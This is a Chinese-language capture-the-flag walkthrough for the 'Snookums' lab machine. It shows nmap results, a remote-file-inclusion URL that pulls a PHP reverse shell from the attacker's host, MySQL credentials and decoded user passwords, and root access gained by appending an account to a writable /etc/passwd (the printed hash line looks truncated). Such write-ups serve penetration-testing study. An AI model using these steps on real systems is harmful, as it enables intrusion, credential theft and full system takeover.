主要知识点
- 观察权限,修改 /etc/passwd文件提权
具体步骤
执行nmap,没有太多有用的信息,其实也只有一个80端口值得访问一下
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:01 UTC
Nmap scan report for 192.168.53.58
Host is up (0.0010s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.53
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
80端口运行了一个Simple PHP Photo Gallery v0.8
仔细搜索发现 在0.7版本的该软件有RFI漏洞,根据EXP,先在本地创建php web shell,并修改ip/端口,运行nc -nlvp 80后,访问如下link
http://192.168.215.58/image.php?img=http://192.168.45.239:3306/new_php_shell.php得到reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.215.58] 47170
SOCKET: Shell has connected! PID: 22992
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
ls -l 一下发现有db.php,里面有mysql credential
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
连接MySQL发现三个用户名和密码
mysql> use SimplePHPGal;
use SimplePHPGal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.01 sec)mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
执行cat /etc/passwd可以发现
......
......
michael:x:1000:1000:Michael:/home/michael:/bin/bash
......
......
尝试用两次base64 -d解码 U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== 后,得到密码
C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d
SG9ja1N5ZG5leUNlcnRpZnkxMjM=
C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> echo "SG9ja1N5ZG5leUNlcnRpZnkxMjM=" | base64 -d
HockSydneyCertify123
尝试用该密码以michael身份 ssh登录,成功,并拿到第一个flag
C:\home\kali\Documents\OFFSEC\GoToWork\Snookums> ssh michael@192.168.215.58
The authenticity of host '192.168.215.58 (192.168.215.58)' can't be established.
ED25519 key fingerprint is SHA256:rouy0/8CKEfhPY0eheyBSXy00UrbHzUFfNIMlNdCNfI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.215.58' (ED25519) to the list of known hosts.
michael@192.168.215.58's password:
Last login: Mon Oct 14 07:35:25 2024
[michael@snookums ~]$ clear
[michael@snookums ~]$ ls -lrt
total 4
-rw-r--r--. 1 michael michael 33 Oct 14 02:03 local.txt上传并运行linpeas.sh,发现居然对于/etc/passwd有写权限
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No 利用openssl生成密码后创建/etc/passwd entry
openssl passwd -1 -salt 'tim' '1234'
tim:.XIfIc3zTStgJZBye1:0:0:root:/root:/bin/bash修改/etc/passwd,执行su tim,密码为1234,得到root权限
[michael@snookums tmp]$ su tim
Password:
[tim@snookums tmp]$ cat /root/proof.txt
4dd16e15c91eb4afe33e4225caffa992
